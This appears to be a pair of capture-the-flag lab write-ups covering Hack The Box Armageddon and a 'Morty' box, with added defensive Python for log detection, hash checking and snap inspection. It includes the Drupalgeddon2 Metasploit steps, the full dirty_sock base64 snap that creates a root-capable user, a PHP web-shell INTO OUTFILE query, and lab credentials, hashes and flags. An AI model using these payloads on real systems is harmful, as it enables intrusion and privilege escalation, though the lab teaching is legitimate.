
htb-armageddon-nl

Introduction@Armageddon:~$

Column      Details
Name        armageddon
IP          10.10.10.233
Points      20
OS          Linux
Difficulty  Easy
Creator     bertolis
Out On      27 Mar 2021

Pwned

armageddon git:(master) ssh root@armageddon.htb
root@armageddon.htb
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

  System information as of Thu 21 May 2020 06:11:30 AM UTC

  System load:                      0.07
  Usage of /:                       46.0% of 15.68GB
  Memory usage:                     13%
  Swap usage:                       0%
  Processes:                        218
  Users logged in:                  2
  IPv4 address for br-836575a2ebbb: 172.20.0.1
  IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.10.233

Last login: Thu May 21 06:11:12 2020 from 10.10.XX.XX

Recon

Nmap

┌───[us-free-1][10.10.14.81][root@parrot][~/Desktop/HTB/Armageddon]
└──╼ []$ nmap -sC -sV -oA nmap/result 10.10.10.233
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-28 08:57 CDT
Nmap scan report for 10.10.10.233
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds

Two ports are open: 22 (OpenSSH 7.4) and 80 (Apache 2.4.6 on CentOS with PHP 5.4.16). The http-generator script already identifies the site as Drupal 7, and robots.txt lists the standard Drupal tree (/includes/, /modules/, CHANGELOG.txt, install.php and so on).

Port-80

The site presents a simple Drupal login page.

Checking the page source confirms the CMS: the generator meta tag reads "Drupal 7", matching nmap's http-generator output. (For the exact 7.x release, /CHANGELOG.txt, which robots.txt lists above, is usually readable on Drupal 7 sites and tells you whether the install predates the 7.58 fix for SA-CORE-2018-002.)

Searching for Drupal 7 exploits leads to the Rapid7 page for the Metasploit module covering Drupalgeddon 2 (SA-CORE-2018-002, CVE-2018-7600): a Forms API property injection that gives unauthenticated remote code execution on Drupal 7 before 7.58 and Drupal 8 before 8.5.1.

Link : Drupal Drupalgeddon 2 Forms API Property Injection

Let's try it right away.

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(drupal_drupalgeddon2) > options
    ...options...
msf6 exploit(drupal_drupalgeddon2) > set rhosts 10.10.10.233
msf6 exploit(drupal_drupalgeddon2) > set lhost tun0
    ...show and set options...
msf6 exploit(drupal_drupalgeddon2) > run

The module returns a shell running as the web server user.
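For the defensive side of the same bug, the following Python is an added example (not part of the write-up or of Metasploit) that scans Apache access-log lines for the Forms API property injection the module relies on: a request parameter whose key path contains a '#'-prefixed render property such as name[#post_render][], and the follow-up file/ajax/name/#value/<form_build_id> request with which the public Drupal 7 exploit chain triggers the cached form. The log lines are constructed for the example; the form_build_id in them is a placeholder.

```python
"""Flag Drupalgeddon2-style Forms API property injection in web access logs.

Added example, not part of the original write-up.  Drupal's Forms API treats
array keys that start with '#' (#post_render, #markup, #type, ...) as render
properties, and CVE-2018-7600 let a client smuggle such keys in through
request parameters.  The public Drupal 7 payloads ride on the password-reset
form and put the callback in name[#post_render][], then fetch the poisoned
form through file/ajax/name/#value/<form_build_id>.  Both show up in the
request line of an Apache access log, with '#' encoded as %23.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# A bracketed '#'-key anywhere in a parameter name, e.g. name[#post_render][]
RENDER_PROPERTY = re.compile(r"\[#[a-z_]+\]")
# Second stage of the Drupal 7 chain: the AJAX path that renders the cached form
SECOND_STAGE = re.compile(r"file/ajax/\S*#value")
# Apache combined-format request line: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def injected_properties(target: str) -> list:
    """Return the suspicious parameter names / paths found in one request target."""
    parts = urlsplit(target)
    hits = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        key = unquote(key)  # parse_qsl decoded once; strip a second layer (%2523)
        if RENDER_PROPERTY.search(key):
            hits.append(key)
        if SECOND_STAGE.search(unquote(value)):  # ?q=file/ajax/name/%23value/...
            hits.append(f"{key}={unquote(value)}")
    if SECOND_STAGE.search(unquote(parts.path)):  # clean-URL form of the same
        hits.append(unquote(parts.path))
    return hits


def scan_log(lines) -> list:
    """Return (request target, findings) for every line carrying an injection."""
    alerts = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m is None:
            continue
        findings = injected_properties(m.group("target"))
        if findings:
            alerts.append((m.group("target"), findings))
    return alerts


# Constructed sample lines (not from the original page): one ordinary visit to
# the reset form, then the two requests of the Drupal 7 exploit chain.
SAMPLE_LOG = [
    '10.10.14.81 - - [28/Mar/2021:09:10:11 -0500] "GET /user/password HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '10.10.14.81 - - [28/Mar/2021:09:10:12 -0500] "POST /?q=user/password'
    '&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup'
    '&name%5B%23markup%5D=id HTTP/1.1" 200 1204 "-" "Mozilla/5.0"',
    '10.10.14.81 - - [28/Mar/2021:09:10:13 -0500] "POST /?q=file/ajax/name/'
    '%23value/form-XXXX HTTP/1.1" 200 83 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for target, findings in scan_log(SAMPLE_LOG):
        print(target, "->", findings)
```

The Drupal 8 variant of the bug carries the property in the POST body and in an element_parents value, which an access log does not show; for that you need request-body logging or a WAF rule, not this scanner.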

Now enumerate the box from that shell. Drupal keeps its database credentials in sites/default/settings.php, and /var/www/html/sites/default/settings.php here holds the MySQL connection settings in clear text:

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

Before using them, it's worth trying to upgrade to a stable shell. The usual python3 pty trick doesn't work here, so the MySQL client has to be driven without a TTY.

$ mysql -u drupaluser -h localhost -pCQHEy@9M*m23gBVj
/bin/sh: line 1: snip: No such file or directory

The interactive client needs a terminal. Running one-shot queries with -e instead works fine (passing the password on the command line like this exposes it in the process list and shell history, which is acceptable on a lab box):

$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema

That works. Next, list the tables in the drupal database:

$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdog

Now dump the usernames and password hashes from the users table:

$ mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users;'

brucetherealadmin    $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Voker2311    $S$DuD4Cx2wTstu7dRMFAEXc7Q9JYG85eHz.HcmfCXUTkf67F.BH8PU
ass    $S$Dl3WTyURFuIIM.Krf4zhGeZ7ff2YHvDqClfWEgSSBD.DsKu5GgkA
jack    $S$DoWsI1wuysJEhpRrnYoUS4Yr2UebZ.LJD9TY6y0/2RdRqfzSFjCa
joe    $S$D0MvcWAUp83MLoFhhLNChPf8RfxmlwRQNl7MExhWVeqbnUavoXdY

Save the hashes to a file and run john against rockyou. The $S$ prefix is Drupal 7's native format (iterated SHA-512 derived from phpass; john's Drupal7 format picks it up automatically), and the fourth character encodes the cost: 'D' is index 15 in the ./0-9A-Za-z alphabet, so 2^15 = 32768 rounds, which is the iteration count john reports below.

┌───[us-free-1][10.10.14.81][root@parrot][~/Desktop/HTB/Armageddon]
└──╼ []$ vim hash
┌───[us-free-1][10.10.14.81][root@parrot][~/Desktop/HTB/Armageddon]
└──╼ []$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo           (?)

john recovers brucetherealadmin's password: booboo.
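To see what john was actually grinding through, here is the Drupal 7 hash check reimplemented in Python. This is an added example, not code from the write-up or from Drupal; it follows the algorithm of Drupal 7's includes/password.inc (phpass-style iterated SHA-512 with Drupal's own base64 alphabet, output truncated to 55 characters) and verifies the recovered password against brucetherealadmin's hash from the dump above.

```python
"""Verify a Drupal 7 '$S$' password hash the way user_check_password() does.

Added example, not from the original write-up.  The algorithm is a
re-implementation of Drupal 7's includes/password.inc: the 12-character
setting prefix is "$S$" + cost character + 8-character salt, the digest is
SHA-512 iterated 2^cost times, encoded with the phpass base64 alphabet and
cut to 55 characters.  BRUCE_HASH is the hash dumped in the write-up.
"""
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55              # DRUPAL_HASH_LENGTH
MIN_LOG2, MAX_LOG2 = 7, 30    # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT


def _password_base64_encode(data: bytes) -> str:
    """Drupal's (phpass) base64 variant: 6-bit groups, little-endian, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored: str):
    """Return (iteration count, salt) from the 12-character setting prefix."""
    setting = stored[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 $S$ hash")
    count_log2 = ITOA64.index(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, setting[4:12]


def drupal7_hash(password: str, stored: str) -> str:
    """Recompute the hash of `password` under the salt and cost of `stored`."""
    count, salt = parse_setting(stored)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(count):                 # do { ... } while (--$count) in PHP
        digest = hashlib.sha512(digest + pw).digest()
    return (stored[:12] + _password_base64_encode(digest))[:HASH_LENGTH]


def check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)


BRUCE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"

if __name__ == "__main__":
    count, salt = parse_setting(BRUCE_HASH)
    print(f"rounds={count} salt={salt}")      # rounds=32768, as john reported
    print("booboo ->", check_password("booboo", BRUCE_HASH))
```

Each guess costs 32768 SHA-512 calls, which is why a wordlist attack on five hashes is cheap but not instant, and why a site-wide reset after a settings.php leak matters: the hashes are only as strong as the passwords behind them.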

The same password works for SSH, so log in and read user.txt:

┌───[us-free-1][10.10.14.81][root@parrot][~/Desktop/HTB/Armageddon]
└──╼ []$ ssh brucetherealadmin@10.10.10.233
The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ECDSA key fingerprint is SHA256:bC1R/FE5sI72ndY92lFyZQt4g1VJoSNKOeAkuuRr4Ao.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ECDSA) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: booboo
Last failed login: Mon Mar 29 03:08:40 BST 2021 from 10.10.16.35 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Mon Mar 29 02:57:31 2021 from 10.10.14.209
[brucetherealadmin@armageddon ~]$ cat user.txt 
ffd28820484e213e19034669c32481c6
[brucetherealadmin@armageddon ~]$

Privilege escalation

Before reaching for linpeas, check the obvious things manually. sudo -l shows that brucetherealadmin can run /usr/bin/snap install as root without a password (exactly the command used below), so the question becomes how a snap install can be turned into root.

$ sudo -l

Searching for that leads to the dirty_sock write-ups:

Link : Privilege Escalation in Ubuntu Linux (dirty_sock exploit)

Link : dirty_sock: Linux Privilege Escalation (via snapd)

The dirty_sock Python script itself targets the snapd REST socket (CVE-2019-7304) and doesn't work here, but it isn't needed: the sudo rule already lets us install a snap as root, and a snap's install hook (meta/hooks/install) runs as root during installation. What we do want from the script is the malicious snap it embeds as a base64 string. Decoding that string gives a squashfs image whose hook runs useradd dirty_sock with a preset password hash and then appends dirty_sock ALL=(ALL:ALL) ALL to /etc/sudoers; the plaintext is readable inside the blob below. The snap declares confinement: devmode, hence --devmode on install. The script builds the string as the base64 prefix plus 4256 'A' characters (zero padding of the image) and "==", which the python2 one-liner below reproduces before piping it through base64 -d:

[brucetherealadmin@armageddon tmp]$ python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > dedsec.snap
[brucetherealadmin@armageddon tmp]$ ls
dedsec.snap  systemd-private-1d39dfc07f4144c891b3f86f79a82b7e-httpd.service-OGHVm9  systemd-private-1d39dfc07f4144c891b3f86f79a82b7e-mariadb.service-692MD3  vmware-root_674-2731152261
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode dedsec.snap 
dirty-sock 0.1 installed
[brucetherealadmin@armageddon tmp]$ su dirty_sock
Password: dirty_sock
[dirty_sock@armageddon tmp]$ sudo -i 

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for dirty_sock: dirty_sock
[root@armageddon ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@armageddon ~]# cat root.txt 
785fca2a581bedfe2cc519b4cff3dcb9
You have new mail in /var/spool/mail/root
[root@armageddon ~]#


Note: if "su dirty_sock" doesn't work, reset the box and try again; in my case it worked the second time.
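Before feeding a blob decoded from someone else's script to sudo snap install, it is worth looking at what it contains. The following Python is an added example, not part of the write-up or of dirty_sock: it parses the squashfs superblock of the decoded snap, then reads the install hook and snap.yaml straight out of the uncompressed data region. SNAP_B64 is the leading part of the base64 string from the one-liner above (superblock plus raw file data, cut where the xz-compressed metadata starts); the zero padding and the rest of the image are not needed for this check.

```python
"""Look inside a decoded .snap before running `sudo snap install` on it.

Added example, not part of the write-up or of dirty_sock.  A .snap is a
squashfs image: the first 96 bytes are the superblock (magic, compressor,
version, table offsets), and everything from byte 96 up to the inode table
is file data.  The dirty_sock snap's two files (meta/hooks/install and
meta/snap.yaml) are so small that mksquashfs left them uncompressed, so the
hook that will run as root can be read straight out of that region.
SNAP_B64 is the leading part of the base64 string in the one-liner above.
"""
import base64
import datetime
import struct

SNAP_B64 = (
    "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/"
    "/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAA"
    "IyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1"
    "WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3"
    "Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFH"
    "IHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+"
    "PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBF"
    "bXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0"
    "aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0"
    "CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPA"
)

# squashfs 4.0 superblock: little-endian, 96 bytes
SUPERBLOCK = struct.Struct("<4sIIIIHHHHHHQQQQQQQQ")
COMPRESSORS = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}
FLAGS = {0x0001: "uncompressed_inodes", 0x0002: "uncompressed_data", 0x0004: "check",
         0x0008: "uncompressed_fragments", 0x0010: "no_fragments",
         0x0020: "always_fragments", 0x0040: "duplicates", 0x0080: "exportable",
         0x0100: "uncompressed_xattrs", 0x0200: "no_xattrs",
         0x0400: "compressor_options", 0x0800: "uncompressed_ids"}
NO_TABLE = 0xFFFFFFFFFFFFFFFF        # "table absent" marker for the xattr table


def decode_snap(b64: str = SNAP_B64) -> bytes:
    b64 = b64[: len(b64) - len(b64) % 4]     # keep whole 4-character groups only
    return base64.b64decode(b64)


def parse_superblock(image: bytes) -> dict:
    (magic, inode_count, mod_time, block_size, frag_count, compressor, block_log,
     flags, id_count, major, minor, root_inode, bytes_used, id_table, xattr_table,
     inode_table, dir_table, frag_table, export_table) = SUPERBLOCK.unpack_from(image, 0)
    if magic != b"hsqs":
        raise ValueError("not a little-endian squashfs image (magic %r)" % magic)
    if block_size != 1 << block_log:
        raise ValueError("block_size and block_log disagree")
    return {
        "inode_count": inode_count,
        "mod_time": datetime.datetime.fromtimestamp(mod_time, datetime.timezone.utc),
        "block_size": block_size,
        "fragment_count": frag_count,
        "compressor": COMPRESSORS.get(compressor, "unknown(%d)" % compressor),
        "flags": sorted(name for bit, name in FLAGS.items() if flags & bit),
        "id_count": id_count,
        "version": (major, minor),
        "root_inode": root_inode,
        "bytes_used": bytes_used,
        "id_table_start": id_table,
        "xattr_table_start": None if xattr_table == NO_TABLE else xattr_table,
        "inode_table_start": inode_table,
        "directory_table_start": dir_table,
        "fragment_table_start": frag_table,
        "export_table_start": export_table,
    }


def raw_data_region(image: bytes, sb: dict) -> bytes:
    """File data lives between the superblock and the inode table."""
    return image[SUPERBLOCK.size:sb["inode_table_start"]]


# Strings that should make you stop and read the hook: it runs as root.
ROOT_HOOK_INDICATORS = [b"useradd", b"usermod", b"/etc/sudoers", b"/etc/passwd",
                        b"/etc/shadow", b"chmod u+s", b"authorized_keys"]


def find_root_hook_indicators(data: bytes) -> list:
    return [s.decode() for s in ROOT_HOOK_INDICATORS if s in data]


if __name__ == "__main__":
    image = decode_snap()
    sb = parse_superblock(image)
    for key, value in sb.items():
        print(f"{key:>22}: {value}")
    data = raw_data_region(image, sb)
    print(data.decode("utf-8", "replace"))
    print("indicators:", find_root_hook_indicators(data))
```

For a snap whose files are large enough to be compressed this shortcut no longer works; then unsquashfs -d out file.snap (or a metadata-table parser) is the way to get at meta/hooks/install. Either way the rule is the same: never hand a snap to root, with or without --devmode, without having read its hooks.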

And we pwned it …….


Resources

Drupal Drupalgeddon 2 Forms API Property Injection: https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/
Privilege Escalation in Ubuntu Linux (dirty_sock exploit): https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html
dirty_sock: Linux Privilege Escalation (via snapd): https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py

.

Hash -> OhKUwkvR$.uL.mlYJOz.ubK/FmXouGbU7vCVCG9s00K7R.ny9ryM.vXNdwZhOGCcq7e3XcbA5UpqUp.9eKY4hfLy9m5aU7/

.


ptd-morty-private

.

┌─[✗]─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Fri Mar 5 15:11:41 2021 as: nmap -A -oN allports.nmap 10.150.150.57
Nmap scan report for mortysserver.com (10.150.150.57)
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 e8:60:09:66:aa:1f:e8:76:d8:84:16:18:1c:e4:ee:32 (RSA)
| 256 92:09:d3:0e:f9:47:48:03:9f:32:9f:0f:17:87:c2:a4 (ECDSA)
|_ 256 1d:d1:b3:2b:24:dc:c2:8a:d7:ca:44:39:24:c3:af:3d (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 5 15:11:58 2021 -- 1 IP address (1 host up) scanned in 16.41 seconds
┌─[user@parrot-virtual]─[~/ptd/morty]

.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $curl http://10.150.150.57/note.html
Morty, <br>
if you read this: I've already configured your domain 'mortysserver.com' on this server, don't bother me with it anymore!!
<br>
-Rick 
┌─[user@parrot-virtual]─[~/ptd/morty]

Add 10.150.150.57 mortysserver.com to /etc/hosts.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat secret.txt 
Fl4sk#!
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $md5sum screen.jpeg
df7eb9983c329c32408c5a6be270b3f1  screen.jpeg
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide --info screen.jpeg
"screen.jpeg":
format: jpeg
capacity: 10.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
embedded file "keytotheuniverse.txt":
size: 24.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide extract -sf screen.jpeg 
Enter passphrase: Fl4sk#!
wrote extracted data to "keytotheuniverse.txt".
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $ls -la
total 212
drwxr-xr-x 1 user user 108 Mar 11 11:12 .
drwxr-xr-x 1 user user 2164 Mar 5 15:10 ..
-rw-r--r-- 1 user user 1016 Mar 5 15:11 allports.nmap
-rw-r--r-- 1 user user 24 Mar 11 11:12 keytotheuniverse.txt
-rw-r--r-- 1 user user 204432 Mar 8 09:32 screen.jpeg
-rw-r--r-- 1 user user 9 Mar 11 11:11 secret.txt
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat keytotheuniverse.txt 
rick:WubbaLubbaDubDub1!


.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57
; (1 server found)
;; global options: +cmd
;; Query time: 33 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:46:00 GMT 2021
;; MSG SIZE rcvd: 56

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57 mortysserver.com

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 mortysserver.com
; (1 server found)
;; global options: +cmd
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
mortysserver.com. 900 IN NS 10.150.150.57.
rickscontrolpanel.mortysserver.com. 900 IN A 10.150.150.57
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
;; Query time: 29 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:47:13 GMT 2021
;; XFR size: 4 records (messages 1, bytes 212)

┌─[user@parrot-virtual]─[~/ptd/morty]

We add to our /etc/hosts : 10.150.150.57 mortysserver.com rickscontrolpanel.mortysserver.com email.mortysserver.com

.

We access http://rickscontrolpanel.mortysserver.com

and find FLAG1=921e4db975bda77543cfe83fbe176d15e09ce7e2

We logon to this phpmyadmin site as rick:WubbaLubbaDubDub1!

and find

FLAG2=e39c995fbf614c5c38ca7343f59cc310e5880251

.

In phpMyAdmin, create a database first, then run this query from its SQL tab to try dropping a web shell into the document root:

 SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"

.

The query fails:

Error
SQL query:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/backdoor.php"
MySQL said:
#1 - Can't create/write to file '/var/www/backdoor.php' (Errcode: 13 "Permission denied")

So we can't write there. INTO OUTFILE is written by the mysqld process, not by the web server, so it needs the FILE privilege, a path allowed by secure_file_priv, and a directory the mysql OS user can write to; errno 13 means the last of these fails for /var/www. Writing to /tmp does work, but nothing serves files from there.

.

.

Reading files with the same FILE privilege does work, which confirms the privilege is there and only the target directory was the problem:

SELECT LOAD_FILE('/etc/passwd');

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
